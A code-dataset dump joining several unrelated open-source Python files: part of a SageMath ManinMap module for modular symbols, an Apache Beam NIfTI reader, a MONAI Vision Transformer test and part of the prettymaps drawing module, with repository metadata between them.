Extend the codomain of self to new_codomain. There must be a valid conversion operation from the old to the new codomain. This is most often used for extension of scalars from `\QQ` to `\QQ_p`.
EXAMPLE::
sage: from sage.modular.pollack_stevens.manin_map import ManinMap, M2Z
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: m = ManinMap(S, MR, data); m
Map from the set of right cosets of Gamma0(37) in SL_2(Z) to Sym^0 Q^2
sage: m.extend_codomain(Symk(0, Qp(11)))
Map from the set of right cosets of Gamma0(37) in SL_2(Z) to Sym^0 Q_11^2
"""
new_dict = {}
for g in self._manin.gens():
new_dict[g] = new_codomain(self._dict[g])
return ManinMap(new_codomain, self._manin, new_dict, check)
def _compute_image_from_gens(self, B):
r"""
Compute the image of ``B`` under ``self``.
INPUT:
- ``B`` -- generator of Manin relations.
OUTPUT:
- an element in the codomain of self (e.g. a distribution), the image of ``B`` under ``self``.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10)
sage: MR = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, MR, data)
sage: f._compute_image_from_gens(MR.reps()[1])
(10 + 10*11 + O(11^2), 8 + O(11))
"""
L = self._manin.relations(B)
# could raise KeyError if B is not a generator
t = self._codomain(0)
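        # accumulate c * (value on generator rep g | A) over the relation expressing B in terms of the generators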
for c, A, g in L:
g1 = self._dict[self._manin.reps(g)] * A
t += g1 * c
return t.normalize()
def __getitem__(self, B):
r"""
Compute the image of ``B`` under ``self``.
INPUT:
- ``B`` -- coset representative of Manin relations.
OUTPUT:
- an element in the codomain of self (e.g. a distribution), the image of ``B`` under ``self``.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37); MR.gens()
[
[1 0] [ 0 -1] [-1 -1] [-1 -2] [-2 -3] [-3 -1] [-1 -4] [-4 -3]
[0 1], [ 1 4], [ 4 3], [ 3 5], [ 5 7], [ 7 2], [ 2 7], [ 7 5],
<BLANKLINE>
[-2 -3]
[ 3 4]
]
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: D = OverconvergentDistributions(2, 37, 40)
sage: f = ManinMap(D, MR, data)
sage: f.__getitem__(MR.gens()[1])
1 + O(37)
sage: f.__getitem__(MR.gens()[3])
O(37^40)
sage: f.__getitem__(MR.gens()[5])
36 + O(37)
sage: f[MR.gens()[5]]
36 + O(37)
"""
try:
return self._dict[B]
except KeyError:
# To prevent memory overflow
return self._compute_image_from_gens(B)
# self._dict[B] = self._compute_image_from_gens(B)
# return self._dict[B]
def compute_full_data(self):
r"""
Compute the values of self on all coset reps from its values on our generating set.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37); MR.gens()
[
[1 0] [ 0 -1] [-1 -1] [-1 -2] [-2 -3] [-3 -1] [-1 -4] [-4 -3]
[0 1], [ 1 4], [ 4 3], [ 3 5], [ 5 7], [ 7 2], [ 2 7], [ 7 5],
<BLANKLINE>
[-2 -3]
[ 3 4]
]
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: len(f._dict)
9
sage: f.compute_full_data()
sage: len(f._dict)
38
"""
for B in self._manin.reps():
if not B in self._dict:
self._dict[B] = self._compute_image_from_gens(B)
def __add__(self, right):
r"""
Return sum self + right, where self and right are
assumed to have identical codomains and Manin relations.
INPUT:
- ``self`` and ``right`` -- two Manin maps with the same codomain and Manin relations.
OUTPUT:
- the sum of ``self`` and ``right`` -- a Manin map
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10); D
Space of 11-adic distributions with k=0 action and precision cap 10
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: f+f # indirect doctest
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: (f+f)(M2Z([1,0,0,1]))
(2 + O(11^2), 4 + O(11))
"""
D = {}
sd = self._dict
rd = right._dict
for ky, val in sd.iteritems():
if ky in rd:
D[ky] = val + rd[ky]
return self.__class__(self._codomain, self._manin, D, check=False)
def __sub__(self, right):
"""
Return difference self - right, where self and right are
assumed to have identical codomains and Manin relations.
INPUT:
- ``self`` and ``right`` -- two Manin maps with the same codomain and Manin relations.
OUTPUT:
- the difference of ``self`` and ``right`` -- a Manin map
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10); D
Space of 11-adic distributions with k=0 action and precision cap 10
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: f-f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: (f-f)(M2Z([1,0,0,1]))
(O(11^2), O(11))
"""
D = {}
sd = self._dict
rd = right._dict
for ky, val in sd.iteritems():
if ky in rd:
D[ky] = val - rd[ky]
return self.__class__(self._codomain, self._manin, D, check=False)
def __mul__(self, right):
"""
Return scalar multiplication self * right, where right is in the
base ring of the codomain.
INPUT:
- ``self`` -- a Manin map.
- ``right`` -- an element of the base ring of the codomain of self.
OUTPUT:
        - the scalar multiplication ``self * right`` -- a Manin map
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: f*2
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: (f*2)(M2Z([1,0,0,1]))
(2 + O(11^2), 4 + O(11))
"""
tp = Sigma0(self._manin.level())(MatrixSpace(ZZ, 2, 2)([1, 0, 0, 1]))
if isinstance(right, type(tp)):
return self._right_action(right)
D = {}
sd = self._dict
for ky, val in sd.iteritems():
D[ky] = val * right
return self.__class__(self._codomain, self._manin, D, check=False)
def __repr__(self):
"""
Return string representation of self.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f.__repr__()
'Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10'
"""
return "Map from the set of right cosets of Gamma0(%s) in SL_2(Z) to %s" % (self._manin.level(), self._codomain)
def _eval_sl2(self, A):
r"""
Return the value of self on the unimodular divisor corresponding to `A`.
Note that `A` must be in `SL_2(Z)` for this to work.
INPUT:
- ``A`` -- an element of `SL_2(Z)`
OUTPUT:
The value of self on the divisor corresponding to `A` -- i.e. on the divisor `\{A(0)\} - \{A(\infty)\}`.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10)
sage: MR = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, MR, data)
sage: A = MR.reps()[1]
sage: f._eval_sl2(A)
(10 + 10*11 + O(11^2), 8 + O(11))
"""
SN = Sigma0(self._manin._N)
A = M2Z(A)
B = self._manin.equivalent_rep(A)
gaminv = SN(B * M2Z(A).adjoint())
return (self[B] * gaminv).normalize()
def __call__(self, A):
"""
Evaluate self at A.
INPUT:
- ``A`` -- a `2 \times 2` matrix
OUTPUT:
The value of self on the divisor corresponding to ``A`` -- an element of the codomain of self.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10); D
Space of 11-adic distributions with k=0 action and precision cap 10
sage: manin = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: f(M2Z([2,3,4,5]))
1
"""
a = A[t00]
b = A[t01]
c = A[t10]
d = A[t11]
# v1: a list of unimodular matrices whose divisors add up to {b/d} - {infty}
v1 = unimod_matrices_to_infty(b, d)
# v2: a list of unimodular matrices whose divisors add up to {a/c} - {infty}
v2 = unimod_matrices_to_infty(a, c)
# ans: the value of self on A
ans = self._codomain(0)
# This loop computes self({b/d}-{infty}) by adding up the values of self on elements of v1
for B in v1:
ans = ans + self._eval_sl2(B)
# This loops subtracts away the value self({a/c}-{infty}) from ans by subtracting away the values of self on elements of v2
        # and so in the end ans becomes self({b/d}-{a/c}) = self({A(0)} - {A(infty)})
for B in v2:
ans = ans - self._eval_sl2(B)
return ans.normalize()
def apply(self, f, codomain=None, to_moments=False):
r"""
Return Manin map given by `x \mapsto f(self(x))`, where `f` is
anything that can be called with elements of the coefficient
module.
This might be used to normalize, reduce modulo a prime, change
base ring, etc.
INPUT:
- ``f`` -- anything that can be called with elements of the coefficient module
- ``codomain`` -- (default: None) the codomain of the return map
- ``to_moments`` -- (default: False) if True, will apply ``f`` to each of the moments instead
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: list(f.apply(lambda t:2*t))
[0, 2, 0, 0, 0, -2, 2, 0, 0]
"""
D = {}
sd = self._dict
if codomain is None:
codomain = self._codomain
for ky, val in sd.iteritems():
if to_moments:
D[ky] = codomain([f(val.moment(a))
for a in range(val.precision_absolute())])
else:
D[ky] = f(val)
return self.__class__(codomain, self._manin, D, check=False)
def __iter__(self):
r"""
Return iterator over the values of this map on the reduced
representatives.
This might be used to compute the valuation.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: [a for a in f]
[0, 1, 0, 0, 0, -1, 1, 0, 0]
"""
for A in self._manin.gens():
yield self._dict[A]
def _right_action(self, gamma):
r"""
Return `self | \gamma`, where `\gamma` is a `2 \times 2` integer matrix.
The action is defined by `(self | \gamma)(D) = self(\gamma D)|\gamma`
For the action by a single element `\gamma` to be a modular symbol, `\gamma`
must normalize `\Gamma_0(N)`. However, this right action
can also be used to define Hecke operators, in which case each
individual `self | \gamma` is not a modular symbol on `\Gamma_0(N)`, but
the sum over acting by the appropriate double coset representatives is.
INPUT:
- ``gamma`` - `2 \times 2` integer matrix of nonzero determinant, with a
well-defined action on the coefficient module
OUTPUT:
- the image of self under the action of `\gamma` -- a Manin map.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import ManinMap, M2Z, Sigma0
sage: from sage.modular.pollack_stevens.space import ps_modsym_from_simple_modsym_space
sage: S01 = Sigma0(1)
sage: f = Newforms(7, 4)[0]
sage: f.modular_symbols(1)
Modular Symbols subspace of dimension 1 of Modular Symbols space of dimension 3 for Gamma_0(7) of weight 4 with sign 1 over Rational Field
sage: phi = ps_modsym_from_simple_modsym_space(f.modular_symbols(1))._map
sage: psi = phi._right_action(S01([2,3,4,5])); psi
Map from the set of right cosets of Gamma0(7) in SL_2(Z) to Sym^2 Q^2
sage: from sage.modular.pollack_stevens.space import ps_modsym_from_simple_modsym_space
sage: M = ModularSymbols(17,4,1).cuspidal_subspace()
sage: A = M.decomposition()
sage: f = ps_modsym_from_simple_modsym_space(A[0])._map
sage: g = f._right_action(S01([1,2,0,1]))
sage: g
Map from the set of right cosets of Gamma0(17) in SL_2(Z) to Sym^2 Q^2
sage: x = sage.modular.pollack_stevens.fund_domain.M2Z([2,3,1,0])
sage: g(x)
(17, -34, 69)
"""
D = {}
sd = self._dict
# we should eventually replace the for loop with a call to apply_many
keys = [ky for ky in sd.iterkeys()]
for ky in keys:
D[ky] = self(gamma * ky) * gamma
return self.__class__(self._codomain, self._manin, D, check=False)
def normalize(self):
r"""
Normalize every value of self -- e.g., reduces each value's
`j`-th moment modulo `p^{N-j}`
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f._dict[M2Z([1,0,0,1])]
(1 + O(11^2), 2 + O(11))
sage: g = f.normalize()
sage: g._dict[M2Z([1,0,0,1])]
(1 + O(11^2), 2 + O(11))
"""
sd = self._dict
for val in sd.itervalues():
val.normalize()
return self
def reduce_precision(self, M):
r"""
Reduce the precision of all the values of the Manin map.
INPUT:
- ``M`` -- an integer, the new precision.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f._dict[M2Z([1,0,0,1])]
(1 + O(11^2), 2 + O(11))
sage: g = f.reduce_precision(1)
sage: g._dict[M2Z([1,0,0,1])]
1 + O(11^2)
"""
D = {}
sd = self._dict
for ky, val in sd.iteritems():
D[ky] = val.reduce_precision(M)
return self.__class__(self._codomain, self._manin, D, check=False)
def specialize(self, *args):
r"""
Specialize all the values of the Manin map to a new coefficient
module. Assumes that the codomain has a ``specialize`` method, and
passes all its arguments to that method.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: g = f.specialize()
sage: g._codomain
Sym^0 Z_11^2
"""
D = {}
sd = self._dict
for ky, val in sd.iteritems():
D[ky] = val.specialize(*args)
return self.__class__(self._codomain.specialize(*args), self._manin,
D, check=False)
def hecke(self, ell, algorithm = 'prep'):
r"""
Return the image of this Manin map under the Hecke operator `T_{\ell}`.
INPUT:
- ``ell`` -- a prime
- ``algorithm`` -- a string, either 'prep' (default) or
'naive'
OUTPUT:
- The image of this ManinMap under the Hecke operator
`T_{\ell}`
EXAMPLES::
sage: E = EllipticCurve('11a')
sage: phi = E.pollack_stevens_modular_symbol()
sage: phi.values()
[-1/5, 1, 0]
sage: phi.is_Tq_eigensymbol(7,7,10)
True
sage: phi.hecke(7).values()
[2/5, -2, 0]
sage: phi.Tq_eigenvalue(7,7,10)
-2
"""
self.compute_full_data()
self.normalize()
M = self._manin
if algorithm == 'prep':
## psi will denote self | T_ell
psi = {}
for g in M.gens():
psi_g = sum((self[h] * A for h, A in M.prep_hecke_on_gen_list(ell, g)), self._codomain(0))
psi_g.normalize()
psi[g] = psi_g
return self.__class__(self._codomain, self._manin,
psi, check=False).normalize()
elif algorithm == 'naive':
S0N = Sigma0(self._manin.level())
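            # sum the right action over the coset representatives [1,a;0,ell] (and [ell,0;0,1] when ell does not divide the level)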
psi = self._right_action(S0N([1, 0, 0, ell]))
for a in range(1, ell):
psi += self._right_action(S0N([1, a, 0, ell]))
if self._manin.level() % ell != 0:
psi += self._right_action(S0N([ell, 0, 0, 1]))
return psi.normalize()
else:
raise ValueError('Algorithm must be either "naive" or "prep"')
def p_stabilize(self, p, alpha, V):
r"""
Return the `p`-stablization of self to level `N*p` on which
`U_p` acts by `\alpha`.
INPUT:
- ``p`` -- a prime.
- ``alpha`` -- a `U_p`-eigenvalue.
- ``V`` -- a space of modular symbols.
OUTPUT:
        - The `p`-stabilization of this ManinMap -- a Manin map on which `U_p` acts by `\alpha`
EXAMPLES::
sage: E = EllipticCurve('11a')
sage: phi = E.pollack_stevens_modular_symbol()
sage: f = phi._map
sage: V = phi.parent()
sage: f.p_stabilize(5,1,V)
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Sym^0 Q^2
"""
manin = V.source()
S0 = Sigma0(self._codomain._act._Np)
pmat = S0([p, 0, 0, 1])
D = {}
scalar = 1 / alpha
W = self._codomain.change_ring(scalar.parent())
for g in map(M2Z, manin.gens()):
# we use scale here so that we do not need to define a
# construction functor in order to scale by something
# outside the base ring.
D[g] = W(self._eval_sl2(g) - (self(pmat * g) * pmat).scale(scalar))
ans = self.__class__(W, manin, D, check=False)
return ans
| 39.58912
| 240
| 0.54036
|
e1331642db598a428668a360e315e979f4be73f2
| 1,713
|
py
|
Python
|
healthybrains/inputoutput.py
|
Enucatl/machine-learning-healthy-brains
|
bfedc36c1e5657d97e838d9d58ba26af14f703c7
|
[
"MIT"
] | null | null | null |
healthybrains/inputoutput.py
|
Enucatl/machine-learning-healthy-brains
|
bfedc36c1e5657d97e838d9d58ba26af14f703c7
|
[
"MIT"
] | null | null | null |
healthybrains/inputoutput.py
|
Enucatl/machine-learning-healthy-brains
|
bfedc36c1e5657d97e838d9d58ba26af14f703c7
|
[
"MIT"
] | null | null | null |
import io
import nibabel as nb
import numpy as np
import apache_beam as beam
import os
class _Nifti1Source(beam.io.filebasedsource.FileBasedSource):
def __init__(self, file_pattern, min_bundle_size):
super(_Nifti1Source, self).__init__(
file_pattern=file_pattern,
min_bundle_size=min_bundle_size,
splittable=False)
def read_records(self, file_name, range_tracker):
with self.open_file(file_name) as f:
hdr_fh = nb.fileholders.FileHolder(fileobj=f)
header = nb.Nifti1Image.header_class.from_fileobj(f)
array_proxy = header.data_from_fileobj(f)
data = array_proxy[..., 0]
yield (file_name, data)
class ReadNifti1(beam.transforms.PTransform):
def __init__(self,
file_pattern=None,
min_bundle_size=0
):
super(ReadNifti1, self).__init__()
self._file_pattern = file_pattern
self._min_bundle_size = min_bundle_size
def apply(self, pcoll):
return pcoll.pipeline | beam.io.Read(
_Nifti1Source(
file_pattern=self._file_pattern,
min_bundle_size=self._min_bundle_size))
def fake_data(element):
    # unpack the (file_name, data) pair; tuple parameters are not valid Python 3 syntax
    file_name, data = element
    return file_name, np.arange(10), np.arange(10)
def thickness_data_to_string(element):
    file_name, thickness = element
output_string = io.BytesIO()
np.save(output_string, np.array([file_name]))
np.save(output_string, thickness)
final_string = output_string.getvalue()
return final_string
def id_from_file_name(file_name):
basename = os.path.splitext(os.path.basename(file_name))[0]
file_id = int(basename.split("_")[1])
return file_id
| 29.534483
| 64
| 0.665499
|
0dce73b0cbc3458c202000941565586e5fafcc8a
| 5,336
|
py
|
Python
|
tests/test_vit.py
|
madil90/MONAI
|
2f1c7a5d1b47c8dd21681dbe1b67213aa3278cd7
|
[
"Apache-2.0"
] | 1
|
2021-08-20T01:54:26.000Z
|
2021-08-20T01:54:26.000Z
|
tests/test_vit.py
|
madil90/MONAI
|
2f1c7a5d1b47c8dd21681dbe1b67213aa3278cd7
|
[
"Apache-2.0"
] | null | null | null |
tests/test_vit.py
|
madil90/MONAI
|
2f1c7a5d1b47c8dd21681dbe1b67213aa3278cd7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import torch
from parameterized import parameterized
from monai.networks import eval_mode
from monai.networks.nets.vit import ViT
TEST_CASE_Vit = []
for dropout_rate in [0.6]:
for in_channels in [4]:
for hidden_size in [768]:
for img_size in [96, 128]:
for patch_size in [16]:
for num_heads in [12]:
for mlp_dim in [3072]:
for num_layers in [4]:
for num_classes in [2]:
for pos_embed in ["conv"]:
# for classification in [False, True]: # TODO: test classification
for nd in (2, 3):
test_case = [
{
"in_channels": in_channels,
"img_size": (img_size,) * nd,
"patch_size": (patch_size,) * nd,
"hidden_size": hidden_size,
"mlp_dim": mlp_dim,
"num_layers": num_layers,
"num_heads": num_heads,
"pos_embed": pos_embed,
"classification": False,
"num_classes": num_classes,
"dropout_rate": dropout_rate,
},
(2, in_channels, *([img_size] * nd)),
(2, (img_size // patch_size) ** nd, hidden_size),
]
if nd == 2:
test_case[0]["spatial_dims"] = 2 # type: ignore
TEST_CASE_Vit.append(test_case)
class TestPatchEmbeddingBlock(unittest.TestCase):
@parameterized.expand(TEST_CASE_Vit)
def test_shape(self, input_param, input_shape, expected_shape):
net = ViT(**input_param)
with eval_mode(net):
result, _ = net(torch.randn(input_shape))
self.assertEqual(result.shape, expected_shape)
def test_ill_arg(self):
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(128, 128, 128),
patch_size=(16, 16, 16),
hidden_size=128,
mlp_dim=3072,
num_layers=12,
num_heads=12,
pos_embed="conv",
classification=False,
dropout_rate=5.0,
)
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(32, 32, 32),
patch_size=(64, 64, 64),
hidden_size=512,
mlp_dim=3072,
num_layers=12,
num_heads=8,
pos_embed="perceptron",
classification=False,
dropout_rate=0.3,
)
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(96, 96, 96),
patch_size=(8, 8, 8),
hidden_size=512,
mlp_dim=3072,
num_layers=12,
num_heads=14,
pos_embed="conv",
classification=False,
dropout_rate=0.3,
)
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(97, 97, 97),
patch_size=(4, 4, 4),
hidden_size=768,
mlp_dim=3072,
num_layers=12,
num_heads=8,
pos_embed="perceptron",
classification=False,
dropout_rate=0.3,
)
with self.assertRaises(ValueError):
ViT(
in_channels=4,
img_size=(96, 96, 96),
patch_size=(16, 16, 16),
hidden_size=768,
mlp_dim=3072,
num_layers=12,
num_heads=12,
pos_embed="perc",
classification=False,
dropout_rate=0.3,
)
if __name__ == "__main__":
unittest.main()
| 38.948905
| 107
| 0.431222
|
6d715a141b52afcd1bdb3b095a830788105eaec5
| 8,242
|
py
|
Python
|
prettymaps/draw.py
|
sofia-ab/prettymaps
|
f223c859d5231954ab29794a901844b37539c017
|
[
"MIT"
] | 1
|
2021-08-31T16:28:16.000Z
|
2021-08-31T16:28:16.000Z
|
prettymaps/draw.py
|
stsievert/prettymaps
|
47c5d01e093ccf93ef6582a13bfe894ce0f5b2fa
|
[
"MIT"
] | null | null | null |
prettymaps/draw.py
|
stsievert/prettymaps
|
47c5d01e093ccf93ef6582a13bfe894ce0f5b2fa
|
[
"MIT"
] | null | null | null |
import re
from collections.abc import Iterable
import osmnx as ox
import pandas as pd
from geopandas import GeoDataFrame
import numpy as np
from numpy.random import choice
from shapely.geometry import Polygon, MultiPolygon, MultiLineString, GeometryCollection
from shapely.affinity import translate, scale, rotate
from descartes import PolygonPatch
from tabulate import tabulate
from IPython.display import Markdown, display
from .fetch import get_perimeter, get_layer
# Helper functions
def get_hash(key):
return frozenset(key.items()) if type(key) == dict else key
# Drawing functions
def show_palette(palette, description = ''):
'''
Helper to display palette in Markdown
'''
colorboxes = [
f''
for c in palette
]
display(Markdown((description)))
display(Markdown(tabulate(pd.DataFrame(colorboxes), showindex = False)))
def get_patch(shape, **kwargs):
'''
Convert shapely object to matplotlib patch
'''
#if type(shape) == Path:
# return patches.PathPatch(shape, **kwargs)
if type(shape) == Polygon and shape.area > 0:
return PolygonPatch(list(zip(*shape.exterior.xy)), **kwargs)
else:
return None
# Plot a single shape
def plot_shape(shape, ax, vsketch = None, **kwargs):
'''
Plot shapely object
'''
if isinstance(shape, Iterable) and type(shape) != MultiLineString:
for shape_ in shape:
plot_shape(shape_, ax, vsketch = vsketch, **kwargs)
else:
if not shape.is_empty:
if vsketch is None:
ax.add_patch(PolygonPatch(shape, **kwargs))
else:
if ('draw' not in kwargs) or kwargs['draw']:
if 'stroke' in kwargs:
vsketch.stroke(kwargs['stroke'])
else:
vsketch.stroke(1)
if 'penWidth' in kwargs:
vsketch.penWidth(kwargs['penWidth'])
else:
vsketch.penWidth(0.3)
if 'fill' in kwargs:
vsketch.fill(kwargs['fill'])
else:
vsketch.noFill()
vsketch.geometry(shape)
# Plot a collection of shapes
def plot_shapes(shapes, ax, vsketch = None, palette = None, **kwargs):
'''
Plot collection of shapely objects (optionally, use a color palette)
'''
if not isinstance(shapes, Iterable):
shapes = [shapes]
for shape in shapes:
if palette is None:
plot_shape(shape, ax, vsketch = vsketch, **kwargs)
else:
plot_shape(shape, ax, vsketch = vsketch, fc = choice(palette), **kwargs)
# Parse query (by coordinates, OSMId or name)
def parse_query(query):
if isinstance(query, GeoDataFrame):
return 'polygon'
elif isinstance(query, tuple):
return 'coordinates'
elif re.match('''[A-Z][0-9]+''', query):
return 'osmid'
else:
return 'address'
# Apply transformation (translation & scale) to layers
def transform(layers, x, y, scale_x, scale_y, rotation):
# Transform layers (translate & scale)
k, v = zip(*layers.items())
v = GeometryCollection(v)
if (x is not None) and (y is not None):
v = translate(v, *(np.array([x, y]) - np.concatenate(v.centroid.xy)))
if scale_x is not None:
v = scale(v, scale_x, 1)
if scale_y is not None:
v = scale(v, 1, scale_y)
if rotation is not None:
v = rotate(v, rotation)
